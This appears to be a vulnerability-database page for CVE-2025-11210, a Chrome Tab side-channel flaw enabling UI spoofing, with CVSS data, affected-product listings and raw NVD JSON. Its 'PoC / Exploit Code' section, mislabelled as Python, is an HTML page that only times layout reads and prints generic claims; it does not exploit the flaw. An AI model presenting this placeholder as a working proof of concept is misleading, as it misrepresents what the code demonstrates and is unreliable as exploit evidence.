Security Vulnerability Report
中文
CVE-2025-11210 CVSS 5.4 MEDIUM

CVE-2025-11210

Published: 2025-11-06 22:15:39
Last Modified: 2025-11-13 15:29:48

Description

Side-channel information leakage in Tab in Google Chrome prior to 141.0.7390.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 141.0.7390.54
Chromium-based browsers with similar Tab implementation < 141.0.7390.54

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-11210 PoC - UI Spoofing via Side-channel Information Leakage --> <!DOCTYPE html> <html> <head> <title>CVE-2025-11210 PoC</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .poc-container { max-width: 600px; margin: 0 auto; } .warning { background: #fff3cd; border: 1px solid #ffc107; padding: 15px; border-radius: 4px; } button { background: #007bff; color: white; padding: 10px 20px; border: none; cursor: pointer; } #results { margin-top: 20px; white-space: pre-wrap; font-family: monospace; } </style> </head> <body> <div class="poc-container"> <h1>CVE-2025-11210 PoC</h1> <div class="warning"> <strong>Warning:</strong> This is a proof-of-concept for educational and security testing purposes only. </div> <h2>Vulnerability Details</h2> <p><strong>Type:</strong> Side-channel information leakage leading to UI spoofing</p> <p><strong>Affected:</strong> Google Chrome < 141.0.7390.54</p> <p><strong>CVSS:</strong> 5.4 (Medium)</p> <h2>Attack Scenario</h2> <p>1. Attacker creates a malicious HTML page</p> <p>2. User visits the page and performs specific UI gestures</p> <p>3. Page collects side-channel timing information</p> <p>4. Attacker uses information to perform UI spoofing</p> <button onclick="simulateAttack()">Simulate Attack</button> <div id="results"></div> </div> <script> function simulateAttack() { const results = document.getElementById('results'); const startTime = performance.now(); // Simulate side-channel timing analysis const measurements = []; for (let i = 0; i < 100; i++) { const t0 = performance.now(); // Simulate Tab interaction timing document.body.offsetHeight; const t1 = performance.now(); measurements.push(t1 - t0); } const avgTime = measurements.reduce((a, b) => a + b, 0) / measurements.length; results.textContent = `Side-channel Analysis Results: - Measurements taken: ${measurements.length} - Average timing: ${avgTime.toFixed(4)}ms - Min: ${Math.min(...measurements).toFixed(4)}ms - Max: ${Math.max(...measurements).toFixed(4)}ms This timing information could be used to: 1. Detect user tab switching patterns 2. Infer sensitive information through timing variations 3. Execute UI spoofing attacks based on observed behavior Mitigation: Upgrade to Chrome 141.0.7390.54 or later`; } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11210", "sourceIdentifier": "[email protected]", "published": "2025-11-06T22:15:38.947", "lastModified": "2025-11-13T15:29:47.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Side-channel information leakage in Tab in Google Chrome prior to 141.0.7390.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1300"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "141.0.7390.54", "matchCriteriaId": "008031A0-CC1E-47CF-A136-90F4FE1FA9A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_30.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/440523110", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}